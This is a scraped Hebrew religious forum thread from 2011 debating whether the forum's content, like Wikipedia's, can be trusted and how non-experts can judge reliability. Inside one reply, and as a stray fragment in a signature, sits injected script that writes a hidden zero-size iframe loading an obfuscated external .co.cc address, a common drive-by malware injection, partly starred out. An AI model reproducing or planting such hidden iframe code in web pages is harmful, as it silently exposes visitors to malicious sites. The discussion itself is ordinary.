בית פורומים עצור כאן חושבים

האם ניתן לסמוך על המידע שבעצכ'ח?

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-24/11/2011 22:07 לינק ישיר 
האם ניתן לסמוך על המידע שבעצכ'ח?

קראתי במספר מקומות על בעיית הסתמכות תלמידים על מידע שמקבלים באינטרנט, ובפרט באתרים הפתוחים לכל כמו ויקיפידיה. על אף שזה מאד דמוקרטי, ולכאורה אמור להיות תהליך של בירור האמת מן השקר ע"י שהוא פתוח לבקורת מכל אחד כולל מומחים לדבר, בכל זאת עדיין התוצאות רחוקות מלהיות אמינות מספיק.

אני רוצה להעתיק את הדיון הזה אל הפורום שלנו. יש בו דיונים על המון נושאים שביהדות, בפרט כאלה שלא מרבים לדון בהם במקומות אחרים, ובהעלאת צדדים וסברות שלא מרבים לדון בהם במקום אחר. מכל מקום יש להיזהר מלסמוך על המובא פה יותר מדי. אני מכיר בעצמי שכמה דברם כתבתי פה בצורה מאד פסקנית ואחרי שלמדתי יותר נוכחתי שבכלל אין הדברים כמו שתארתי, ומכיוון שאף אחד לא תיקן אותי אף אני לא טרחתי לתקן.

ובכן, יש לכתוב כאן אזהרה וגילוי נאות. הגם שזה מקום טוב מאד למצוא דיונים וכיווני חשיבה בכל מיני נושאים מעניינים וחשובים. עדיין התוצאות רחוקות מלהיות אמינות מספיק בכדי לסמוך עליהם אפילו כלפי לימוד הנושאים גרידא. כל שכן לא לגבי להחליט מזה החלטות חשובות בחיים. ובזה פטרנו דרך אגב גם את הבעיה של המציצים פה ונפגעים.

דווח על תוכן פוגעני

נשלח ב-28/11/2011 15:15 לינק ישיר 

צענע

דדווח על תוכן פוגעני

נשלח ב-28/11/2011 13:01 לינק ישיר 

מכיוון שעצכ"ח איננו פורום מידע אלא פורום של החלפת דעות  הרי שאלת פותח האשכול אינה במקומה.

דדווח על תוכן פוגעני

נשלח ב-28/11/2011 09:18 לינק ישיר 

מיימוני כתב:
מן הראוי היה לארגן טבלה של ציונים שמדרגת מאמרים בפורום לפי האמון, הבהירות ועוד, כפי שיש את זה בויקיפדיה. אבל אין לנו אפשרות טכנית.

אם פעם יהיה לנו אתר, ובו מאמרים לחוד ודיונים לחוד, אפשר יהיה לדרג את המאמרים. אבל זה חלום לימות המשיח או קצת קודם, כנראה.******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

לדעתי זה מאד רלוונטי לויקיפדיה, וכמעט לא רלוונטי לעצכ"ח, בגלל אחד הכללים הראשיים של ויקיפדיה
Wikipedia should not contain original research
בויקפדיה, במפורש, אתה יכול לנסות לכתוב ערך על חוק פיזיקאלי חדש שאתה מוכיח לכולי עלמא את נכונותו, והערך יימחק בטענה שעליך קודם כל לפרסם אותו במקום אחר.

כאן זה שונה. נקח את סדרת המאמרים של ד"ר אברהם, לדוגמה (זו שהיתה בynet), ונדמיין לרגע (לא משהו מופרך) שהוא היה כותב אותן כמאמר בעצכ"ח. מה היתה התועלת בכך שהיו מדרגים את האמון בדבריו, מלבד איזשהו מדד פופולריות לו ולדעתו? בויקפדיה, קל יחסית לאדם לנמק מדוע אין לו אמון בדברים: התיאור בויקיפדיה של ספרו של ד"ר אברהם אינו מתאים לתוכן, לדוגמה. בעצכ"ח, הנימוק הוא פשוט הדיון הקיים ממילא, לא?

אפשר לטעון שיש מאמרים אחרים בעצכ"ח, עובדתיים יותר. לדעתי מספרם זניח (אין דבר רע בזה - זה אתר דעות).
אתה מוזמן לספק דוגמאות נגדיות.

תוקן על ידי xibolaiyu ב- 28/11/2011 09:23:18

דדווח על תוכן פוגעני

נשלח ב-28/11/2011 08:47 לינק ישיר 

מן הראוי היה לארגן טבלה של ציונים שמדרגת מאמרים בפורום לפי האמון, הבהירות ועוד, כפי שיש את זה בויקיפדיה. אבל אין לנו אפשרות טכנית.

אם פעם יהיה לנו אתר, ובו מאמרים לחוד ודיונים לחוד, אפשר יהיה לדרג את המאמרים. אבל זה חלום לימות המשיח או קצת קודם, כנראה.

בינתים יש לנו את האשכולות ובהם תגובות. כאשר התגובות הן רציניות, וביקורתיות, הן מצביעות על כשלים. כאשר התגובות הן תוקפניות וללא נימוקים, הן לפחות מעידות שלא הכל מסכימים עם הנאמר. זה מה שיש. לכן גם ראוי למי שחולק באיזו נקודה לציין בקיצור ובנימוק את דעתו החולקת בכל אשכול. אני מודה שאני עצמי איני מגיע לכל אשכול כדי לעשות זאת. (ולכן בעיני עדיפים אשכולות קצרים המלנקקים זה לזה).

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-28/11/2011 01:19 לינק ישיר 

יהיאור כתב:
גם מזה וגם מזה אל תנח ידך. [בקיצור, איני רואה כאן סתירה]

לא רציתי לחלוק עליך בעיקר רציתי לומר שאנו משכילים גם במדע ובטבע מאנשים כלאה דווקא, הרב היותר מפרופ' גאוותן וכדומה,

סתם ניסיון אישי שלא שאלתי אחרים מהם מרגישים,

דדווח על תוכן פוגעני

נשלח ב-28/11/2011 01:16 לינק ישיר 

גם מזה וגם מזה אל תנח ידך. [בקיצור, איני רואה כאן סתירה]

דדווח על תוכן פוגעני

נשלח ב-28/11/2011 01:10 לינק ישיר 

יהיאור כתב:
 אחרים ממה? 

אחרים מי הרעיונות שנתת לעיל,

דדווח על תוכן פוגעני

נשלח ב-28/11/2011 00:51 לינק ישיר 

maxmen כתב:
יהיאור היקר 

אני קיבלתי כללים אחרים בלימוד מרב,
1, צניעות ענוו
2, בעל מידות טובות
3, פתיחות הדעת,= ראש פתוח,

וכמה מוזר שאותם כללים בלימוד תורה נכון גם בלימוד מדע וטבע ופילוסופיה,

אחרים ממה? 

דדווח על תוכן פוגעני

נשלח ב-28/11/2011 00:36 לינק ישיר 

יהיאור היקר 

אני קיבלתי כללים אחרים בלימוד מרב,
1, צניעות ענוו
2, בעל מידות טובות
3, פתיחות הדעת,= ראש פתוח,

וכמה מוזר שאותם כללים בלימוד תורה נכון גם בלימוד מדע וטבע ופילוסופיה,

דדווח על תוכן פוגעני

נשלח ב-27/11/2011 23:45 לינק ישיר 

יהיאור כתב:

http://en.wikipedia.org/wiki/Reliability_of_Wikipedia

ניתן לסמוך על הערך הזה? פרדוקס השקרן...

ושכחתי לציין את הפרדוקס השני. אשכול בעצכ"ח:

האם ניתן לסמוך על המידע שבעצכ"ח?

דדווח על תוכן פוגעני

נשלח ב-27/11/2011 22:06 לינק ישיר 

יהיאור כתב:

אם לא היית משמיט את השורה שרשמתי לפני, היה אפשר לראות את הניסוח שלי לאותה בדיחה בדיוק.

דדווח על תוכן פוגעני

נשלח ב-27/11/2011 21:53 לינק ישיר 

xibolaiyu כתב:

דדווח על תוכן פוגעני

נשלח ב-27/11/2011 21:14 לינק ישיר 

בשאלה היאך אדם רגיל יכול להבחין בין מידע אמין ללא אמין בדברים ששייכם להתמחות מסויימת. בלי ללמוד בעצמו.
אז יש דרכים לעמוד על כך, מהם אינטואיטיביים, מהם שאפשר להגדיר במילים.
א. הוא מה שכתבתי, אם יש ספר שכותב על הרבה נושאים, ובאחד מהם אתה מתמצא, תבדוק מה הוא אומר על זה ותדון במה מצינו לשאר הדברים בהם אנך מתמצא [למשל בויקיפידיה, בנושאים שקראתי ואני מכיר, אני רואה שיש הרבה לתקן, בפרט ערכי יהדות מאד לא מבוררים שם. ]
ב. אפשר לראות אם הכותב מקיף את הנושא מכל הצדדים
ג. האם הוא מביא מראי מקומות לדבריו. ואפשר גם לבדוק את המ"מ
ד. האם נראה שנכתב מגמתי. אם כן, אפילו שייתכן שהמגמה הזאת אמתית, מ"מ כבר אי אפשר לסמוך כראוי על האובייקטיביות של הדברים [דוגמא לדבר ספרי מבח"תים שונים, לחלופין ספרי המטיפים נגד שונים] 

בקיצור אחרי שקוראים קצת על נושא יכולים להתרשם מי מומחה באמת ומה מידת מהימנותו. אפילו ללא לימוד הנושא עצמו. 

דדווח על תוכן פוגעני

נשלח ב-27/11/2011 20:08 לינק ישיר 

מיימוני

הכוונה, שאתה כאדם חרדי ש(כך אני מניח) לא למד באקדמיה (למרות שלמד רבות, ובתחומים מסוימים מכניס אותי בכיס הקטן, כאוטודידקט), ובוודאי אנשים שאין להם גם את אותו ידע אוטודידקטי, מאמינים כתורה למשה מסיני / לרבי עקיבא מדעתו בכל טענה שיטענו הנ"ל בנושאים שאתם לא מכירים מספיק, בהנחה ויטענו במילים מספיק גבוהות ובציטוטים של דמויות סמכות דגולות. ופוק חזי מאי עמא דבר, איך מתייחסים בחרדת קודש לכל היוצא מפיו של ד"ר (למשל השטויות של ד"ר הדסה מלמד על המבול, אותם ציטט ייתכן קודם) מכיוון שמדובר בדבר מאוד נדיר בכפר שבו יוניברעסיטאטען הן נחלתם של אלו שמעבר לגבול ושפתיים יישק (=ייסגרו) כאשר מישהו משתמש באופן (שנראה כ-) קוהרנטי במונחים לועזיים מרשימים. ומה זה משנה ד"ר לְמַה ועל מה הוא מדבר? העיקר שיש לו הכרות עם המוסד המכובד מבפנים, ובכך הוא בוודאי ידען יותר יחסית לבני הכפר.

דוגמה: הספר הפילוסופי של האחרון, שמכיל בינות לכל המלל המובא בצורה בלתי מובנת (כן כן, הבעיה היא בי כמובן, העדר מוּבָנוּת הוא חד משמעית עדות לעמקות אינסופית שמתקשה לרדת לעם - כך זה מקובל לפחות לגבי הגות דתית -  ולא, למשל, להעדר מתודולוגיית כתיבה או לניסיון לערפל) ניתן לדלות אולי שני טיעונים מעורפלים ולא חדשניים במיוחד (כאנדרסטייטמנט) שטופלו היטב בפילוסופיה שמחוץ לאקדמיית עצכ"ח/ליהדות. כמובן שניתן לטעון שהטיפול בהם לא הפריך אותם ולא הפחית מתוקפם, אך לשם כך יש להביא בצורה מסודרת את הטענות השונות, הטיעונים התומכים וטיעוני הנגד. אי אפשר, למשל, לדבר על הטיעון הקוסמולוגי, ומהבעיה הבסיסית בו - העברת השאלה שלב אחד אחורה (ומי ברא את אלוהים?) למקום בו היא הופכת לקשה יותר (שהרי אלוהים הוא באמת irreducible complex היותר מורכב שיכול להיות, בניגוד לטבע שמורכבו מגיעה מדברים פשוטים ואינה אלא סיכום שלהם) - להתחמק ב'אלגנטיות' במשפט (שמקובל אולי בשיח דתי/חרדי) ש"בהגות היהודית נטען שאלוהים הוא פשוט, ואכמ"ל". מה שלא מונע מכל הרוצה ליטול את השם לשלוח לקרוא את ספרו העמוק שעונה על כל השאלות וכו'. בחייאת, בנאדם מתווכח על אבולוציה כשהוא צריך לשאול בעמוד 10 מה זה פנוטיפ? תתנרמלו! (כאן יבוא הטוען ויטען שמספיק שמבינים את העיקרון ולא צריך להבין את הפרטים, בשביל דיון פילוסופי. שהרי פילוסופיה ומדע אינם על אותו המישור. אולי תיאורטית זה נכון, אבל מעשית - טיעונים פילוסופיים מסתמכים פעמים רבות על אלמנטים מדעיים או על תובנות שניתן לגזור מאספקטים מדעיים, וכדי לדון פילוסופית במשמעותה של תיאוריה מסוימת יש ללמוד אותה.).

תוקן על ידי thepresent ב- 27/11/2011 20:14:56

דדווח על תוכן פוגעני

נשלח ב-27/11/2011 20:08 לינק ישיר 

אני מקווה שאתם לא הולכים לכיוון הדמגוגי הישן שאין לדעת בלי ללמוד ורק אנשים מיוחדים יודעים,

ובכן זה היית ביהדות כל הדורות ועכשיו במאות האחרונות גם הנאור יטען כך כלפי המדע, ומשפטן יטען כך כלפי המשפט, וכו' וכו' וכו'

ב"ה עברנו את זה ואת פרעה, ויש לנו את הפורום הטוב שלנו,

והנה כאן באים אנשים שכן למדו כל אחד את תחומו, ואין תורת הסוד בשום מקום באמת,
אפשר לדון בכל תחום (נקבל לפעמים גידופים אבל אין הביישן לומד) ולהשכיל,

עכשיו איפה בכל העולם יש כזה דבר ??? תורה קבלה מדע מכל הוסוגים פילוסופיה חברה משפט אידיאולגיות שונות,
מה חסר כאן חוץ מכוס בירה,
(אני גם משתדל להביא את כל ההרצאות המדעים הכי חדשים, ספרן מביא את המאמרים הטובים ברשת, ויש לנו את הרב מימוני שמנתח כל דבר כמו מנתח אמיתי, יש כאן את החברה חברה עם ההומר המגניב, איך לו נזכיר את ירוחם היקר,
בקיצור לא מתחשק לנו לעזוב לעולמים)

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > האם ניתן לסמוך על המידע שבעצכ'ח?
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 3 4 לדף הבא סך הכל 4 דפים.

bholext